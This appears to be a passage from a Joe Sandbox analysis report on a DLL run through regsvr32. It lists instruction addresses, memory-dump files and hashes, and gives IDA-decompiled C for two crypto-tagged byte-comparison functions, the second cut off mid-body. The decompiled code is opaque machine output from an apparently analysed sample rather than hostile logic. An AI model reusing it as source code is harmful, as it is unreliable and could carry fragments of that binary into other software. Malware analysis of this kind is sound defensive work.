                                                                                                                0x1004b9ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9ec
                                                                                                                0x1004b9c7
                                                                                                                0x1004b9cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b9cb
                                                                                                                0x1004b929
                                                                                                                0x1004b92b
                                                                                                                0x1004b942
                                                                                                                0x1004b94a
                                                                                                                0x1004b94c
                                                                                                                0x1004b963
                                                                                                                0x1004b96b
                                                                                                                0x1004b96d
                                                                                                                0x1004b984
                                                                                                                0x1004b98c
                                                                                                                0x1004b98e
                                                                                                                0x1004b99b
                                                                                                                0x1004b99b
                                                                                                                0x00000000
                                                                                                                0x1004b98e
                                                                                                                0x1004b97a
                                                                                                                0x1004b97e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b97e
                                                                                                                0x1004b959
                                                                                                                0x1004b95d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b95d
                                                                                                                0x1004b938
                                                                                                                0x1004b93c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b892
                                                                                                                0x1004b892
                                                                                                                0x1004b896
                                                                                                                0x1004b89a
                                                                                                                0x1004b89c
                                                                                                                0x1004b8b3
                                                                                                                0x1004b8b3
                                                                                                                0x1004b8b7
                                                                                                                0x1004b8bb
                                                                                                                0x1004b8bd
                                                                                                                0x1004b8d4
                                                                                                                0x1004b8d4
                                                                                                                0x1004b8d8
                                                                                                                0x1004b8dc
                                                                                                                0x1004b8de
                                                                                                                0x1004b8f5
                                                                                                                0x1004b8f5
                                                                                                                0x1004b8f9
                                                                                                                0x1004b8fd
                                                                                                                0x1004b8ff
                                                                                                                0x1004b905
                                                                                                                0x1004b908
                                                                                                                0x1004b90c
                                                                                                                0x1004b90c
                                                                                                                0x00000000
                                                                                                                0x1004b8ff
                                                                                                                0x1004b8e4
                                                                                                                0x1004b8e7
                                                                                                                0x1004b8eb
                                                                                                                0x1004b8ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b8ef
                                                                                                                0x1004b8c3
                                                                                                                0x1004b8c6
                                                                                                                0x1004b8ca
                                                                                                                0x1004b8ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b8ce
                                                                                                                0x1004b8a2
                                                                                                                0x1004b8a5
                                                                                                                0x1004b8a9
                                                                                                                0x1004b8ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b8ad
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction ID: 7b5a7c5434aea4c44cb1393324e9d8359c5f3d1551e4eab25712ed6b60d88d4d
                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction Fuzzy Hash: 30D16F73C0EDF30683B5C12D409822EEBA2AFC159132BC3F59CD47F389966A5D5496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004B46A Relevance: .4, Instructions: 378COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B46A(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                                                0x1004b46a
                                                                                                                0x1004b46a
                                                                                                                0x1004b470
                                                                                                                0x1004b4ef
                                                                                                                0x1004b4f1
                                                                                                                0x1004b4f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4f9
                                                                                                                0x1004b4ff
                                                                                                                0x1004b57e
                                                                                                                0x1004b580
                                                                                                                0x1004b582
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b588
                                                                                                                0x1004b58e
                                                                                                                0x1004b60d
                                                                                                                0x1004b60f
                                                                                                                0x1004b611
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b617
                                                                                                                0x1004b61d
                                                                                                                0x1004b69c
                                                                                                                0x1004b69e
                                                                                                                0x1004b6a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6a6
                                                                                                                0x1004b6ac
                                                                                                                0x1004b72b
                                                                                                                0x1004b72d
                                                                                                                0x1004b72f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b73b
                                                                                                                0x1004b7bb
                                                                                                                0x1004b7bd
                                                                                                                0x1004b7bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b7c5
                                                                                                                0x1004b7cb
                                                                                                                0x1004b84a
                                                                                                                0x1004b84c
                                                                                                                0x1004b84e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b85c
                                                                                                                0x1004b056
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004b86a
                                                                                                                0x1004b86c
                                                                                                                0x1004b448
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x00000000
                                                                                                                0x1004b452
                                                                                                                0x1004b879
                                                                                                                0x1004b87f
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x1004b7d4
                                                                                                                0x1004b7d6
                                                                                                                0x1004b7ed
                                                                                                                0x1004b7f5
                                                                                                                0x1004b7f7
                                                                                                                0x1004b80e
                                                                                                                0x1004b816
                                                                                                                0x1004b818
                                                                                                                0x1004b82f
                                                                                                                0x1004b837
                                                                                                                0x1004b839
                                                                                                                0x1004b846
                                                                                                                0x1004b846
                                                                                                                0x00000000
                                                                                                                0x1004b839
                                                                                                                0x1004b825
                                                                                                                0x1004b829
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b829
                                                                                                                0x1004b804
                                                                                                                0x1004b808
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b808
                                                                                                                0x1004b7e3
                                                                                                                0x1004b7e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b7e7
                                                                                                                0x1004b745
                                                                                                                0x1004b747
                                                                                                                0x1004b75e
                                                                                                                0x1004b766
                                                                                                                0x1004b768
                                                                                                                0x1004b77f
                                                                                                                0x1004b787
                                                                                                                0x1004b789
                                                                                                                0x1004b7a0
                                                                                                                0x1004b7a8
                                                                                                                0x1004b7aa
                                                                                                                0x1004b7b7
                                                                                                                0x1004b7b7
                                                                                                                0x00000000
                                                                                                                0x1004b7aa
                                                                                                                0x1004b796
                                                                                                                0x1004b79a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b79a
                                                                                                                0x1004b775
                                                                                                                0x1004b779
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b779
                                                                                                                0x1004b754
                                                                                                                0x1004b758
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b758
                                                                                                                0x1004b6b5
                                                                                                                0x1004b6b7
                                                                                                                0x1004b6ce
                                                                                                                0x1004b6d6
                                                                                                                0x1004b6d8
                                                                                                                0x1004b6ef
                                                                                                                0x1004b6f7
                                                                                                                0x1004b6f9
                                                                                                                0x1004b710
                                                                                                                0x1004b718
                                                                                                                0x1004b71a
                                                                                                                0x1004b727
                                                                                                                0x1004b727
                                                                                                                0x00000000
                                                                                                                0x1004b71a
                                                                                                                0x1004b706
                                                                                                                0x1004b70a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b70a
                                                                                                                0x1004b6e5
                                                                                                                0x1004b6e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6e9
                                                                                                                0x1004b6c4
                                                                                                                0x1004b6c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6c8
                                                                                                                0x1004b626
                                                                                                                0x1004b628
                                                                                                                0x1004b63f
                                                                                                                0x1004b647
                                                                                                                0x1004b649
                                                                                                                0x1004b660
                                                                                                                0x1004b668
                                                                                                                0x1004b66a
                                                                                                                0x1004b681
                                                                                                                0x1004b689
                                                                                                                0x1004b68b
                                                                                                                0x1004b698
                                                                                                                0x1004b698
                                                                                                                0x00000000
                                                                                                                0x1004b68b
                                                                                                                0x1004b677
                                                                                                                0x1004b67b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b67b
                                                                                                                0x1004b656
                                                                                                                0x1004b65a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b65a
                                                                                                                0x1004b635
                                                                                                                0x1004b639
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b639
                                                                                                                0x1004b597
                                                                                                                0x1004b599
                                                                                                                0x1004b5b0
                                                                                                                0x1004b5b8
                                                                                                                0x1004b5ba
                                                                                                                0x1004b5d1
                                                                                                                0x1004b5d9
                                                                                                                0x1004b5db
                                                                                                                0x1004b5f2
                                                                                                                0x1004b5fa
                                                                                                                0x1004b5fc
                                                                                                                0x1004b609
                                                                                                                0x1004b609
                                                                                                                0x00000000
                                                                                                                0x1004b5fc
                                                                                                                0x1004b5e8
                                                                                                                0x1004b5ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5ec
                                                                                                                0x1004b5c7
                                                                                                                0x1004b5cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5cb
                                                                                                                0x1004b5a6
                                                                                                                0x1004b5aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5aa
                                                                                                                0x1004b508
                                                                                                                0x1004b50a
                                                                                                                0x1004b521
                                                                                                                0x1004b529
                                                                                                                0x1004b52b
                                                                                                                0x1004b542
                                                                                                                0x1004b54a
                                                                                                                0x1004b54c
                                                                                                                0x1004b563
                                                                                                                0x1004b56b
                                                                                                                0x1004b56d
                                                                                                                0x1004b57a
                                                                                                                0x1004b57a
                                                                                                                0x00000000
                                                                                                                0x1004b56d
                                                                                                                0x1004b559
                                                                                                                0x1004b55d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b55d
                                                                                                                0x1004b538
                                                                                                                0x1004b53c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b53c
                                                                                                                0x1004b517
                                                                                                                0x1004b51b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b472
                                                                                                                0x1004b472
                                                                                                                0x1004b475
                                                                                                                0x1004b479
                                                                                                                0x1004b47b
                                                                                                                0x1004b492
                                                                                                                0x1004b492
                                                                                                                0x1004b496
                                                                                                                0x1004b49a
                                                                                                                0x1004b49c
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b3
                                                                                                                0x1004b4b7
                                                                                                                0x1004b4bb
                                                                                                                0x1004b4bd
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d4
                                                                                                                0x1004b4d8
                                                                                                                0x1004b4dc
                                                                                                                0x1004b4de
                                                                                                                0x1004b4e4
                                                                                                                0x1004b4e7
                                                                                                                0x1004b4eb
                                                                                                                0x1004b4eb
                                                                                                                0x00000000
                                                                                                                0x1004b4de
                                                                                                                0x1004b4c3
                                                                                                                0x1004b4c6
                                                                                                                0x1004b4ca
                                                                                                                0x1004b4ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4ce
                                                                                                                0x1004b4a2
                                                                                                                0x1004b4a5
                                                                                                                0x1004b4a9
                                                                                                                0x1004b4ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b4ad
                                                                                                                0x1004b481
                                                                                                                0x1004b484
                                                                                                                0x1004b488
                                                                                                                0x1004b48c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b48c
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction ID: 92b78bd843577d70adc6c0f5fbd64983c0a0ea5f252a0995e29b88b46b4a0767
                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction Fuzzy Hash: 5AD17E73C0EDB30A83B5C12D40A822EEAA2AFC169133BC7F5DCD46F389D52A5D5496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004B05E Relevance: .4, Instructions: 361COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B05E(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
